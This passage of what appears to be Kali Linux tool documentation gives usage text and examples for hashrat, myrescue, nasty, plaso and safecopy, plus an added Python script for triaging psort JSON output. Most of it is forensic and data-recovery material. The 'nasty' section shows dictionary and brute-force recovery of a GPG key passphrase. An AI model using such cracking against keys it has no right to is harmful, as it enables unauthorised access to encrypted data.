-memcached <server> Specify memcached server. (Overrides reading list from stdin if used with -m, -c or -cf).
-mcd <server> Specify memcached server. (Overrides reading list from stdin if used with -m, -c or -cf).
-h <script> Script to run when a file fails CHECK mode, or is found in MATCH mode.
-hook <script> Script to run when a file fails CHECK mode, or is found in FIND mode
-color Use ANSI color codes on output when checking hashes.
-strict Strict mode: when checking, check file mtime, owner, group, and inode as well as it's hash
-S Strict mode: when checking, check file mtime, owner, group, and inode as well as it's hash
-d dereference (follow) symlinks
-fs Stay on one file system
-dir DirMode: Read all files in directory and create one hash for them!
-dirmode DirMode: Read all files in directory and create one hash for them!
-devmode DevMode: read from a file EVEN OF IT'S A DEVNODE
-lines Read lines from stdin and hash each line independently.
-rawlines Read lines from stdin and hash each line independently, INCLUDING any trailing whitespace. (This is compatible with 'echo text | md5sum')
-rl Read lines from stdin and hash each line independently, INCLUDING any trailing whitespace. (This is compatible with 'echo text | md5sum')
-cgi Run in HTTP CGI mode
-cgi Run in HTTP CGI mode
-xdialog Run in 'xdialog' (zenity, yad or qarama) mode
-dialog-types <list> Specify a list of dialog commands and use the first found on the system. Default is 'yad,zenity,qarma'
-iprefix <prefix> String to prefix all input before hashing
-oprefix <prefix> Prefix to add to the front of output hashes
-net Treat 'file' arguments as either ssh or http URLs, and pull files over the network and then hash them (Allows hashing of files on remote machines).
URLs are in the format ssh://[username]:[password]@[host]:[port] or http://[username]:[password]@[host]:[port]..
-idfile <path> Path to an ssh private key file to use to authenticate INSTEAD OF A PASSWORD when pulling files via ssh.
-xattr Use eXtended file ATTRibutes. In hash mode, store hashes in the file attributes, in check mode compare against hashes stored in file attributes.
-txattr Use TRUSTED eXtended file ATTRibutes. In hash mode, store hashes in 'trusted' file attributes. 'trusted' attributes can only be read and written by root. Under freebsd this menas SYSTEM attributes.
-attrs comma-separated list of filesystem attribute names to be set to the value of the hash.
-cache Use hashes stored in 'user' xattr if they're younger than the mtime of the file. This speeds up outputting hashes.
-u <types> Update. In checking mode, update hashes for the files as you go. <types> is a comma-separated list of things to update, which can be 'xattr' 'memcached' or a file name. This will update these targets with the hash that was found at the time of checking.
-hide-input When reading data from stdin in linemode, set the terminal to not echo characters, thus hiding typed input.
-star-input When reading data from stdin in linemode replace characters with stars.
-xsel Update X11 clipboard and primary selections to the current hash. This works using Xterm command sequences. The xterm resource 'allowWindowOps' must be set to 'true' for this to work.
-clip Update X11 clipboard to the current hash. This works using the 'xsel', 'xclip' or 'pbcopy' commands, or if none of those are installed falls back to Xterm clipboard as in the '-xsel' option .
-qr Display the current hash as a qrcode. This requires the 'qrencode' command to be installed, and also an image viewer like fim, feh, or imagemagick display to be installed.
-qrcode Display the current hash as a qrcode. This requires the 'qrencode' command to be installed, and also an image viewer like fim, feh, or imagemagick display to be installed.
-clipcmd <cmds> Comma separated list of clipboard-setter commands to use instead of the defaults.
-viewcmd <cmds> Comma separated list of image-viewer commands to use instead of the defaults.
■ Example
# Compute the hash of standard input
root@kali:~# echo "Hello World" | hashrat -sha256 -lines
a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e
# Compute the hash of a file
root@kali:~# hashrat -sha256 hello.php
hash='sha256:cbae314ce52ca82874640b8a05d24d425ae492b29cb3d6c91495611a1b14031a' type='file' mode='100644' uid='0' gid='0' size='14302' mtime='1728724641' inode='693032' path='hello.php'
# Search for files whose hash matches
root@kali:~# echo "5916afc5ff0a1573922cb50195f8438417b1757f8d40b337257e0f7a8544a3a9" | hashrat -sha256 -m -r .
LOCATED: 5916afc5ff0a1573922cb50195f8438417b1757f8d40b337257e0f7a8544a3a9 at Plugin/AbstractPluginManager.php
myrescue
Copies the readable data from damaged hard disks, CD-ROMs, DVDs, flash drives and similar media to another file or block device.
■ Usage
root@kali:~# myrescue -h
myrescue [<options>] <input-file> <output-file>
options:
-b <block-size> block size in bytes, default: 4096
-B <bitmap-file> bitmap-file, default: <output-file>.bitmap
-A abort on error
-S skip errors (exponential-step)
-f <number> skip blocks with <number> or more failures
-r <retry-count> try up to <retry-count> reads per block, default: 1
-s <start-block> start block number, default: 0
-e <end-block> end block number (excl.), default: size of <input-file>
-G <range> only read <range> blocks around good ones
-F <range> skip <range> blocks around failed ones
-J <number> randomly jump after reading a few sectors
-T make -A, -S and -F avoid blocks that took long to read
-R reverse copy direction
-U <dev-file> USB device reset after read error
(something like /dev/bus/usb/XXX/XXX !)
-h, -? usage information
■ Example
# Create a block device with error sectors inserted
root@kali:~# dmsetup create baddevice << EOF
0 2000 linear /dev/loop0 0
2000 96 error
2096 202704 linear /dev/loop0 2096
EOF
# Copy the device containing errors to an image
root@kali:~# myrescue /dev/mapper/baddevice backup.img
block 000000250 (000000000-000025600, 0.98%) ok 000000250 bad 000000000 src read failed: Input/output error
block 000000251 (000000000-000025600, 0.98%) ok 000000250 bad 000000001 src read failed: Input/output error
block 000000252 (000000000-000025600, 0.98%) ok 000000250 bad 000000002 src read failed: Input/output error
block 000000253 (000000000-000025600, 0.99%) ok 000000250 bad 000000003 src read failed: Input/output error
block 000000254 (000000000-000025600, 0.99%) ok 000000250 bad 000000004 src read failed: Input/output error
block 000000255 (000000000-000025600, 1.00%) ok 000000250 bad 000000005 src read failed: Input/output error
block 000000256 (000000000-000025600, 1.00%) ok 000000250 bad 000000006 src read failed: Input/output error
block 000000257 (000000000-000025600, 1.00%) ok 000000250 bad 000000007 src read failed: Input/output error
block 000000258 (000000000-000025600, 1.01%) ok 000000250 bad 000000008 src read failed: Input/output error
block 000000259 (000000000-000025600, 1.01%) ok 000000250 bad 000000009 src read failed: Input/output error
block 000000260 (000000000-000025600, 1.02%) ok 000000250 bad 000000010 src read failed: Input/output error
block 000000261 (000000000-000025600, 1.02%) ok 000000250 bad 000000011 src read failed: Input/output error
block 000025600 (000000000-000025600, 100.00%) ok 000025588 bad 000000012
Nasty
Recovers the passphrase of a PGP or GPG key.
■ Usage
root@kali:~# nasty -h
-a x set minimum length of passphrase
-b x set maximum length
-m x set guessing mode:
incremental: try them all
random: try at random
file: read phrases from file (use -i)
-i x file to read the passphrases from
-f x file to write the found passphrase to
-c x... charset, one or more from the following:
a: a-z
A: A-Z
0: 0-9
.: all ascii values (32...126)
+: 32...255 (default(!))
-k x filter string to select a key
-v enable verbose mode
■ Example
root@kali:~# nasty -i words.txt -m file 515E70E3B3F1E8664434FCEFCC19168AB4CF9036
Using CC19168AB4CF9036: prograti <test@example.com>
OK
Passphrase is: hello
Plaso
Parses a variety of log files and forensic artifacts from computers, network devices and other related systems and builds a single correlated timeline.
■ Usage
root@kali:~# log2timeline --help
usage: log2timeline.py [-h] [--troubles] [-V] [--artifact_definitions PATH] [--custom_artifact_definitions PATH] [--data PATH]
[--archives TYPES] [--artifact_filters ARTIFACT_FILTERS] [--artifact_filters_file PATH] [--extract_winreg_binary]
[--preferred_year YEAR] [--skip_compressed_streams] [-f FILE_FILTER] [--hasher_file_size_limit SIZE]
[--hashers HASHER_LIST] [--parsers PARSER_FILTER_EXPRESSION] [--yara_rules PATH] [--partitions PARTITIONS]
[--volumes VOLUMES] [--codepage CODEPAGE] [--language LANGUAGE_TAG] [--no_extract_winevt_resources] [-z TIME_ZONE]
[--no_vss] [--vss_only] [--vss_stores VSS_STORES] [--credential TYPE:DATA] [-d] [-q] [-u] [--info] [--use_markdown]
[--no_dependencies_check] [--logfile FILENAME] [--status_view TYPE] [--status_view_file PATH]
[--status_view_interval SECONDS] [--buffer_size BUFFER_SIZE] [--queue_size QUEUE_SIZE] [--single_process]
[--process_memory_limit SIZE] [--temporary_directory DIRECTORY] [--vfs_back_end TYPE] [--worker_memory_limit SIZE]
[--worker_timeout MINUTES] [--workers WORKERS] [--sigsegv_handler] [--profilers PROFILERS_LIST]
[--profiling_directory DIRECTORY] [--profiling_sample_rate SAMPLE_RATE] [--storage_file PATH] [--storage_format FORMAT]
[--task_storage_format FORMAT]
[SOURCE]
positional arguments:
SOURCE Path to a source device, file or directory. If the source is a supported storage media device or image file, archive
file or a directory, the files within are processed recursively.
options:
-h, --help Show this help message and exit.
--troubles Show troubleshooting information.
-V, --version Show the version information.
data location arguments:
--artifact_definitions PATH, --artifact-definitions PATH
Path to a directory or file containing artifact definitions, which are .yaml files. Artifact definitions can be used
to describe and quickly collect data of interest, such as specific files or Windows Registry keys.
--custom_artifact_definitions PATH, --custom-artifact-definitions PATH
Path to a directory or file containing custom artifact definitions, which are .yaml files. Artifact definitions can be
used to describe and quickly collect data of interest, such as specific files or Windows Registry keys.
--data PATH Path to a directory containing the data files.
extraction arguments:
--archives TYPES Define a list of archive and storage media image types for which to process embedded file entries, such as TAR
(archive.tar) or ZIP (archive.zip). This is a comma separated list where each entry is the name of an archive type,
such as "tar,zip". "all" indicates that all archive types should be enabled. "none" disables processing file entries
embedded in archives. Use "--archives list" to list the available archive types. WARNING: this can make processing
significantly slower.
--artifact_filters ARTIFACT_FILTERS, --artifact-filters ARTIFACT_FILTERS
Names of forensic artifact definitions, provided on the command command line (comma separated). Forensic artifacts are
stored in .yaml files that are directly pulled from the artifact definitions project. You can also specify a custom
artifacts yaml file (see --custom_artifact_definitions). Artifact definitions can be used to describe and quickly
collect data of interest, such as specific files or Windows Registry keys.
--artifact_filters_file PATH, --artifact-filters_file PATH
Names of forensic artifact definitions, provided in a file with one artifact name per line. Forensic artifacts are
stored in .yaml files that are directly pulled from the artifact definitions project. You can also specify a custom
artifacts yaml file (see --custom_artifact_definitions). Artifact definitions can be used to describe and quickly
collect data of interest, such as specific files or Windows Registry keys.
--extract_winreg_binary, --extract-winreg-binary
Extract binary Windows Registry values. WARNING: This can make processing significantly slower.
--preferred_year YEAR, --preferred-year YEAR
When a format's timestamp does not include a year, e.g. syslog, use this as the initial year instead of attempting
auto-detection.
--skip_compressed_streams, --skip-compressed-streams
Skip processing file content within compressed streams, such as syslog.gz and syslog.bz2.
-f FILE_FILTER, --filter-file FILE_FILTER, --filter_file FILE_FILTER, --file-filter FILE_FILTER, --file_filter FILE_FILTER
List of files to include for targeted collection of files to parse, one line per file path, setup is /path|file -
where each element can contain either a variable set in the preprocessing stage or a regular expression.
--hasher_file_size_limit SIZE, --hasher-file-size-limit SIZE
Define the maximum file size in bytes that hashers should process. Any larger file will be skipped. A size of 0
represents no limit.
--hashers HASHER_LIST
Define a list of hashers to use by the tool. This is a comma separated list where each entry is the name of a hasher,
such as "md5,sha256". "all" indicates that all hashers should be enabled. "none" disables all hashers. Use "--hashers
list" or "--info" to list the available hashers.
--parsers PARSER_FILTER_EXPRESSION
Define which presets, parsers and/or plugins to use, or show possible values. The expression is a comma separated
string where each element is a preset, parser or plugin name. Each element can be prepended with an exclamation mark
to exclude the item. Matching is case insensitive. Examples: "linux,!bash_history" enables the linux preset, without
the bash_history parser. "sqlite,!sqlite/chrome_history" enables all sqlite plugins except for chrome_history.
"win7,syslog" enables the win7 preset, as well as the syslog parser. Use "--parsers list" or "--info" to list
available presets, parsers and plugins.
--yara_rules PATH, --yara-rules PATH
Path to a file containing Yara rules definitions.
--partitions PARTITIONS, --partition PARTITIONS
Define partitions to be processed. A range of partitions can be defined as: "3..5". Multiple partitions can be defined
as: "1,3,5" (a list of comma separated values). Ranges and lists can also be combined as: "1,3..5". The first
partition is 1. All partitions can be specified with: "all".
--volumes VOLUMES, --volume VOLUMES
Define volumes to be processed. A range of volumes can be defined as: "3..5". Multiple volumes can be defined as:
"1,3,5" (a list of comma separated values). Ranges and lists can also be combined as: "1,3..5". The first volume is 1.
All volumes can be specified with: "all".
--codepage CODEPAGE The preferred codepage, which is used for decoding single-byte or multi-byte character extracted strings.
--language LANGUAGE_TAG
The preferred language, which is used for extracting and formatting Windows EventLog message strings. Use "--language
list" to see a list of supported language tags. The en-US (LCID 0x0409) language is used as fallback if preprocessing
could not determine the system language or no language information is available in the winevt-rc.db database.
--no_extract_winevt_resources, --no-extract-winevt-resources
Do not extract Windows EventLog resources such as event message template strings. By default Windows EventLog
resources will be extracted when a Windows EventLog parser is enabled.
-z TIME_ZONE, --zone TIME_ZONE, --timezone TIME_ZONE
preferred time zone of extracted date and time values that are stored without a time zone indicator. The time zone is
determined based on the source data where possible otherwise it will default to UTC. Use "list" to see a list of
available time zones.
--no_vss, --no-vss Do not scan for Volume Shadow Snapshots (VSS). This means that Volume Shadow Snapshots (VSS) are not processed.
WARNING: this option is deprecated use --vss_stores=none instead.
--vss_only, --vss-only
Do not process the current volume if Volume Shadow Snapshots (VSS) have been selected.
--vss_stores VSS_STORES, --vss-stores VSS_STORES
Define Volume Shadow Snapshots (VSS) (or stores) that need to be processed. A range of snapshots can be defined as:
"3..5". Multiple snapshots can be defined as: "1,3,5" (a list of comma separated values). Ranges and lists can also be
combined as: "1,3..5". The first snapshot is 1. All snapshots can be defined as: "all" and no snapshots as: "none".
--credential TYPE:DATA
Define a credentials that can be used to unlock encrypted volumes e.g. BitLocker. The credential is defined as
type:data e.g. "password:BDE-test". Supported credential types are: key_data, password, recovery_password,
startup_key. Binary key data is expected to be passed in BASE-16 encoding (hexadecimal). WARNING credentials passed
via command line arguments can end up in logs, so use this option with care.
informational arguments:
-d, --debug Enable debug output.
-q, --quiet Disable informational output.
-u, --unattended Enable unattended mode and do not ask the user for additional input when needed, but terminate with an error instead.
--info Print out information about supported plugins and parsers.
--use_markdown, --use-markdown
Output lists in Markdown format use in combination with "--hashers list", "--parsers list" or "--timezone list"
--no_dependencies_check, --no-dependencies-check
Disable the dependencies check.
--logfile FILENAME, --log_file FILENAME, --log-file FILENAME
Path of the file in which to store log messages, by default this file will be named: "log2timeline-
YYYYMMDDThhmmss.log.gz". Note that the file will be gzip compressed if the extension is ".gz".
--status_view TYPE, --status-view TYPE
The processing status view mode: "file", "linear", "none" or "window".
--status_view_file PATH, --status-view-file PATH
The name of the status view file.
--status_view_interval SECONDS, --status-view-interval SECONDS
Number of seconds to update the status view.
processing arguments:
--buffer_size BUFFER_SIZE, --buffer-size BUFFER_SIZE, --bs BUFFER_SIZE
The buffer size for the output (defaults to 196MiB).
--queue_size QUEUE_SIZE, --queue-size QUEUE_SIZE
The maximum number of queued items per worker (defaults to 125000)
--single_process, --single-process
Indicate that the tool should run in a single process.
--process_memory_limit SIZE, --process-memory-limit SIZE
Maximum amount of memory (data segment) a process is allowed to allocate in bytes, where 0 represents no limit. The
default limit is 4294967296 (4 GiB). This applies to both the main (foreman) process and the worker processes. This
limit is enforced by the operating system and will supersede the worker memory limit (--worker_memory_limit).
--temporary_directory DIRECTORY, --temporary-directory DIRECTORY
Path to the directory that should be used to store temporary files created during processing.
--vfs_back_end TYPE, --vfs-back-end TYPE
The preferred dfVFS back-end: "auto", "fsext", "fsfat", "fshfs", "fsntfs", "tsk" or "vsgpt".
--worker_memory_limit SIZE, --worker-memory-limit SIZE
Maximum amount of memory (data segment and shared memory) a worker process is allowed to consume in bytes, where 0
represents no limit. The default limit is 2147483648 (2 GiB). If a worker process exceeds this limit it is killed by
the main (foreman) process.
--worker_timeout MINUTES, --worker-timeout MINUTES
Number of minutes before a worker process that is not providing status updates is considered inactive. The default
timeout is 15.0 minutes. If a worker process exceeds this timeout it is killed by the main (foreman) process.
--workers WORKERS Number of worker processes. The default is the number of available system CPUs minus one, for the main (foreman)
process.
--sigsegv_handler, --sigsegv-handler
Enables the SIGSEGV handler. WARNING this functionality is experimental and will a deadlock worker process if a real
segfault is caught, but not signal SIGSEGV. This functionality is therefore primarily intended for debugging purposes
profiling arguments:
--profilers PROFILERS_LIST
List of profilers to use by the tool. This is a comma separated list where each entry is the name of a profiler. Use "
--profilers list" to list the available profilers.
--profiling_directory DIRECTORY, --profiling-directory DIRECTORY
Path to the directory that should be used to store the profiling sample files. By default the sample files are stored
in the current working directory.
--profiling_sample_rate SAMPLE_RATE, --profiling-sample-rate SAMPLE_RATE
Profiling sample rate (defaults to a sample every 1000 files).
storage arguments:
--storage_file PATH, --storage-file PATH
The path of the storage file. If not specified, one will be made in the form <timestamp>-<source>.plaso
--storage_format FORMAT, --storage-format FORMAT
Format of the storage file, the default is: sqlite. Supported options: sqlite
--task_storage_format FORMAT, --task-storage-format FORMAT
Format for task storage, the default is: sqlite. Supported options: redis, sqlite
root@kali:~# pinfo --help
usage: pinfo.py [-h] [--troubles] [-V] [--logfile FILENAME] [--process_memory_limit SIZE] [--compare STORAGE_FILE] [--output_format FORMAT]
[--hash TYPE] [--report TYPE] [--sections SECTIONS_LIST] [-v] [-w OUTPUTFILE]
[PATH]
positional arguments:
PATH Path to a storage file.
options:
-h, --help Show this help message and exit.
--troubles Show troubleshooting information.
-V, --version Show the version information.
--logfile FILENAME, --log_file FILENAME, --log-file FILENAME
Path of the file in which to store log messages, by default this file will be named: "pinfo-YYYYMMDDThhmmss.log.gz".
Note that the file will be gzip compressed if the extension is ".gz".
--process_memory_limit SIZE, --process-memory-limit SIZE
Maximum amount of memory (data segment) a process is allowed to allocate in bytes, where 0 represents no limit. The
default limit is 4294967296 (4 GiB). This applies to both the main (foreman) process and the worker processes. This
limit is enforced by the operating system and will supersede the worker memory limit (--worker_memory_limit).
--compare STORAGE_FILE
The path of the storage file to compare against.
--output_format FORMAT, --output-format FORMAT
Format of the output, the default is: text. Supported options: json, markdown, text.
--hash TYPE Type of hash to output in file_hashes report. Supported options: md5, sha1, sha256
--report TYPE Report on specific information. Supported options: browser_search, chrome_extension, environment_variables,
file_hashes, list, none, windows_services, winevt_providers
--sections SECTIONS_LIST
List of sections to output. This is a comma separated list where each entry is the name of a section. Use "--sections
list" to list the available sections and "--sections all" to show all available sections.
-v, --verbose Print verbose output.
-w OUTPUTFILE, --write OUTPUTFILE
Output filename.
root@kali:~# psort --help
usage: psort.py [-h] [--troubles] [-V] [--analysis PLUGIN_LIST] [--process_memory_limit SIZE] [--temporary_directory DIRECTORY]
[--worker_memory_limit SIZE] [--worker_timeout MINUTES] [--logfile FILENAME] [-d] [-q] [-u] [--status_view TYPE]
[--status_view_file PATH] [--status_view_interval SECONDS] [--slice DATE_TIME] [--slice_size SLICE_SIZE] [--slicer]
[--data PATH] [-a] [--language LANGUAGE_TAG] [--additional_fields ADDITIONAL_FIELDS] [--custom_fields CUSTOM_FIELDS]
[--custom_formatter_definitions PATH] [--dynamic_time] [--output_time_zone TIME_ZONE] [-o FORMAT] [-w OUTPUT_FILE]
[--fields FIELDS] [--profilers PROFILERS_LIST] [--profiling_directory DIRECTORY] [--profiling_sample_rate SAMPLE_RATE]
[PATH] [FILTER]
positional arguments:
PATH Path to a storage file.
options:
-h, --help Show this help message and exit.
--troubles Show troubleshooting information.
-V, --version Show the version information.
Analysis Arguments:
--analysis PLUGIN_LIST
A comma separated list of analysis plugin names to be loaded or "--analysis list" to see a list of available plugins.
Processing:
--process_memory_limit SIZE, --process-memory-limit SIZE
Maximum amount of memory (data segment) a process is allowed to allocate in bytes, where 0 represents no limit. The
default limit is 4294967296 (4 GiB). This applies to both the main (foreman) process and the worker processes. This
limit is enforced by the operating system and will supersede the worker memory limit (--worker_memory_limit).
--temporary_directory DIRECTORY, --temporary-directory DIRECTORY
Path to the directory that should be used to store temporary files created during processing.
--worker_memory_limit SIZE, --worker-memory-limit SIZE
Maximum amount of memory (data segment and shared memory) a worker process is allowed to consume in bytes, where 0
represents no limit. The default limit is 2147483648 (2 GiB). If a worker process exceeds this limit it is killed by
the main (foreman) process.
--worker_timeout MINUTES, --worker-timeout MINUTES
Number of minutes before a worker process that is not providing status updates is considered inactive. The default
timeout is 15.0 minutes. If a worker process exceeds this timeout it is killed by the main (foreman) process.
Informational Arguments:
--logfile FILENAME, --log_file FILENAME, --log-file FILENAME
Path of the file in which to store log messages, by default this file will be named: "psort-YYYYMMDDThhmmss.log.gz".
Note that the file will be gzip compressed if the extension is ".gz".
-d, --debug Enable debug output.
-q, --quiet Disable informational output.
-u, --unattended Enable unattended mode and do not ask the user for additional input when needed, but terminate with an error instead.
--status_view TYPE, --status-view TYPE
The processing status view mode: "file", "linear", "none" or "window".
--status_view_file PATH, --status-view-file PATH
The name of the status view file.
--status_view_interval SECONDS, --status-view-interval SECONDS
Number of seconds to update the status view.
Filter Arguments:
--slice DATE_TIME Date and time to create a time slice around. This parameter, if defined, will display all events that happened X
minutes before and after the defined date, where X is controlled by the --slice_size option, which is 5 minutes by
default. The date and time must be specified in ISO 8601 format including time zone offset, for example:
20200619T20:09:23+02:00.
--slice_size SLICE_SIZE, --slice-size SLICE_SIZE
Defines the slice size. In the case of a regular time slice it defines the number of minutes the slice size should be.
In the case of the --slicer it determines the number of events before and after a filter match has been made that will
be included in the result set. The default value is 5. See --slice or --slicer for more details about this option.
--slicer Create a time slice around every filter match. This parameter, if defined will save all X events before and after a
filter match has been made. X is defined by the --slice_size parameter.
FILTER A filter that can be used to filter the dataset before it is written into storage. More information about the filters
and how to use them can be found here: https://plaso.readthedocs.io/en/latest/sources/user/Event-filters.html
Input Arguments:
--data PATH Path to a directory containing the data files.
Output Arguments:
-a, --include_all, --include-all
By default the psort removes duplicate entries from the output. This parameter changes that behavior so all events are
included.
--language LANGUAGE_TAG
The preferred language, which is used for extracting and formatting Windows EventLog message strings. Use "--language
list" to see a list of supported language tags. The en-US (LCID 0x0409) language is used as fallback if preprocessing
could not determine the system language or no language information is available in the winevt-rc.db database.
--additional_fields ADDITIONAL_FIELDS, --additional-fields ADDITIONAL_FIELDS
Defines additional fields to be included in the output besides the default fields. Multiple additional field names can
be defined as a list of comma separated values. Output formats that support additional fields are: dynamic, opensearch
and xlsx.
--custom_fields CUSTOM_FIELDS, --custom-fields CUSTOM_FIELDS
Defines custom fields to be included in the output besides the default fields. A custom field is defined as
"name:value". Multiple custom field names can be defined as list of comma separated values. Note that regular fields
will are favoured above custom fields with same name. Output formats that support this are: dynamic, opensearch and
xlsx.
--custom_formatter_definitions PATH, --custom-formatter-definitions PATH
Path to a file containing custom event formatter definitions, which is a .yaml file. Custom event formatter
definitions can be used to customize event messages and override the built-in event formatter definitions.
--dynamic_time, --dynamic-time
Indicate that the output should use dynamic time. Output formats that support dynamic time are: dynamic
--output_time_zone TIME_ZONE, --output-time-zone TIME_ZONE
time zone of date and time values written to the output, if supported by the output format. Use "list" to see a list
of available time zones. Output formats that support an output time zone are: dynamic and l2t_csv.
Output Format Arguments:
-o FORMAT, --output_format FORMAT, --output-format FORMAT
The output format. Use "-o list" to see a list of available output formats.
-w OUTPUT_FILE, --write OUTPUT_FILE
Output filename.
--fields FIELDS Defines which fields should be included in the output.
profiling arguments:
--profilers PROFILERS_LIST
List of profilers to use by the tool. This is a comma separated list where each entry is the name of a profiler. Use "
--profilers list" to list the available profilers.
--profiling_directory DIRECTORY, --profiling-directory DIRECTORY
Path to the directory that should be used to store the profiling sample files. By default the sample files are stored
in the current working directory.
--profiling_sample_rate SAMPLE_RATE, --profiling-sample-rate SAMPLE_RATE
Profiling sample rate (defaults to a sample every 1000 files).
■ Usage example
# Create a timeline from the backup image
root@kali:~# log2timeline --storage_file backup.plaso backup.img
2024-11-04 06:52:23,446 [INFO] (MainProcess) PID:3496 <artifact_definitions> Determined artifact definitions path: /usr/share/artifacts
Checking availability and versions of dependencies.
[OPTIONAL] unable to determine version information for: flor
[OK]
[...]
Tasks: Queued Processing Merging Abandoned Total
0 0 0 0 62205
Identifier PID Status Memory Sources Event Data File
Main 3496 completed 231.6 MiB 62205 (0) 75571 (0)
Worker_00 3500 idle 124.6 MiB 10067 (0) 9968 (0) GZIP:/usr/share/doc/gzip/changelog.Debian.gz
Worker_01 3502 idle 143.4 MiB 11359 (0) 10532 (0) GZIP:/usr/share/man/man3/URI.3pm.gz
Worker_02 3506 idle 147.6 MiB 7170 (0) 11660 (0) GZIP:/usr/share/doc/php5-common/TODO.gz
Worker_03 3510 idle 126.9 MiB 8467 (0) 9194 (0) GZIP:/usr/share/fonts/X11/75dpi/courB12.pcf.gz
Worker_04 3514 idle 141.3 MiB 8527 (0) 12786 (0) GZIP:/usr/share/man/fr/man5/passwd.5.gz
Worker_05 3518 idle 129.1 MiB 6903 (0) 10948 (0) GZIP:/usr/share/fonts/X11/misc/10x20-ISO8859-14.pcf.gz
Worker_06 3522 idle 126.5 MiB 9711 (0) 10483 (0) GZIP:/usr/share/doc/libcairo2/AUTHORS.gz
Processing completed.
Number of warnings generated while extracting events: 401.
# Show what kinds of information were extracted, and other details about the storage file
root@kali:~# pinfo backup.plaso
[...]
******************************** Event sources *********************************
Total : 62205
--------------------------------------------------------------------------------
************************* Events generated per parser **************************
Parser (plugin) name : Number of events
--------------------------------------------------------------------------------
dpkg : 1342
filestat : 228584
olecf_default : 26
olecf_document_summary : 5
olecf_summary : 16
syslog_traditional : 10443
utmp : 1372
vsftpd : 103
Total : 241891
--------------------------------------------------------------------------------
[...]
# Extract the vsftpd log entries from the timeline whose text contains "CONNECT"
root@kali:~# psort -o json -w vsftpd-log.json backup.plaso "data_type is 'vsftpd:log' and text contains 'CONNECT'"
# Format the JSON data for display
root@kali:~# cat vsftpd-log.json | jq -r '. | to_entries[] | .value | { datetime: .date_time.time_elements_tuple | @text "\(.[0])-\(.[1])-\(.[2]) \(.[3]):\(.[4]):\(.[5])", message: .message } | @text "\(.datetime) - \(.message)"'
2024-10-29 14:36:41 - [pid 5207] CONNECT: Client "127.0.0.1"
2024-10-29 15:4:11 - [pid 5328] CONNECT: Client "192.168.11.3"
2024-10-29 15:12:37 - [pid 5767] CONNECT: Client "127.0.0.1"
2024-10-29 15:12:46 - [pid 5770] CONNECT: Client "127.0.0.1"
2024-10-29 15:13:10 - [pid 5784] CONNECT: Client "127.0.0.1"
2024-10-29 15:44:14 - [pid 5303] CONNECT: Client "127.0.0.1"
2024-10-29 15:48:53 - [pid 5278] CONNECT: Client "192.168.11.3"
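As an added example (not code from the original page or from the plaso project), the following Python script does what the jq one-liner above does, but with zero-padded time fields (the jq output above prints 15:4:11 for 15:04:11) and with a per-client count of CONNECT events as a first triage step. The sample JSON is constructed here to mirror the shape the jq expression relies on (an object keyed event_N whose values carry data_type, message and date_time.time_elements_tuple); real psort output carries more keys, which the parser ignores.

```python
import json
import re
from collections import Counter

# Constructed sample in the shape "psort -o json" writes: one object whose
# keys are event_N and whose values carry data_type, message and a date_time
# object with time_elements_tuple [year, month, day, hour, minute, second, ...].
# Real psort output has more keys (__type__, parser, timestamp, ...); the
# parser below ignores them. The vsftpd texts are modelled on the lines above.
SAMPLE_PSORT_JSON = json.dumps({
    "event_0": {
        "data_type": "vsftpd:log",
        "message": '[pid 5207] CONNECT: Client "127.0.0.1"',
        "date_time": {"time_elements_tuple": [2024, 10, 29, 14, 36, 41]},
    },
    "event_1": {
        "data_type": "vsftpd:log",
        "message": '[pid 5328] CONNECT: Client "192.168.11.3"',
        "date_time": {"time_elements_tuple": [2024, 10, 29, 15, 4, 11]},
    },
    "event_2": {
        "data_type": "vsftpd:log",
        "message": '[pid 5328] FAIL LOGIN: Client "192.168.11.3"',
        "date_time": {"time_elements_tuple": [2024, 10, 29, 15, 4, 15]},
    },
    "event_3": {
        "data_type": "syslog:line",
        "message": "sshd[611]: Accepted publickey for deploy from 192.168.11.3 port 50122 ssh2",
        "date_time": {"time_elements_tuple": [2024, 10, 29, 15, 5, 2]},
    },
})

CLIENT_RE = re.compile(r'Client "([^"]+)"')


def load_events(text):
    """Return the event objects of a psort JSON document in event_N order."""
    doc = json.loads(text)
    keys = sorted(doc, key=lambda k: int(k.rsplit("_", 1)[1]))
    return [doc[k] for k in keys]


def format_event(event):
    """Render "YYYY-MM-DD HH:MM:SS - message" with every field zero-padded."""
    y, mo, d, h, mi, s = event["date_time"]["time_elements_tuple"][:6]
    return f"{y:04d}-{mo:02d}-{d:02d} {h:02d}:{mi:02d}:{s:02d} - {event['message']}"


def select(events, data_type, needle):
    """Same selection as the psort filter above: data_type equals the given
    type and the message text contains the given string."""
    return [e for e in events
            if e.get("data_type") == data_type and needle in e.get("message", "")]


def connect_clients(events):
    """Count vsftpd CONNECT events per client address, to see at a glance
    which hosts reached the FTP service during the timeline."""
    counts = Counter()
    for e in select(events, "vsftpd:log", "CONNECT"):
        m = CLIENT_RE.search(e["message"])
        if m:
            counts[m.group(1)] += 1
    return counts


if __name__ == "__main__":
    events = load_events(SAMPLE_PSORT_JSON)
    for e in select(events, "vsftpd:log", "CONNECT"):
        print(format_event(e))
    print("connections per client:", dict(connect_clients(events)))
```

Run it against a real file with `load_events(open("vsftpd-log.json").read())`; the filter function takes the same data_type and text the psort filter string uses.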
Safecopy
Copies the readable data from a damaged hard disk, CD-ROM, DVD, flash drive or similar media to another file or block device.
■ Usage
root@kali:~# safecopy --help
Usage: safecopy [options] <source> <target>
Options:
--stage1 : Preset to rescue most of the data fast,
using no retries and avoiding bad areas.
Presets: -f 10% -r 10% -R 1 -Z 0 -L 2 -M BaDbLoCk
-o stage1.badblocks
--stage2 : Preset to rescue more data, using no retries
but searching for exact ends of bad areas.
Presets: -f 128* -r 1* -R 1 -Z 0 -L 2
-I stage1.badblocks
-o stage2.badblocks
--stage3 : Preset to rescue everything that can be rescued
using maximum retries, head realignment tricks
and low level access.
Presets: -f 1* -r 1* -R 4 -Z 1 -L 2
-I stage2.badblocks
-o stage3.badblocks
All stage presets can be overridden by individual options.
-b <size> : Blocksize for default read operations.
Set this to the physical sectorsize of your media.
Default: 1*
Hardware block size if reported by OS, otherwise 4096
-f <size> : Blocksize when skipping over badblocks.
Higher settings put less strain on your hardware,
but you might miss good areas in between two bad ones.
Default: 16*
-r <size> : Resolution in bytes when searching for the exact
beginning or end of a bad area.
If you read data directly from a device there is no
need to set this lower than the hardware blocksize.
On mounted filesystems however, read blocks
and physical blocks could be misaligned.
Smaller values lead to very thorough attempts to read
data at the edge of damaged areas,
but increase the strain on the damaged media.
Default: 1*
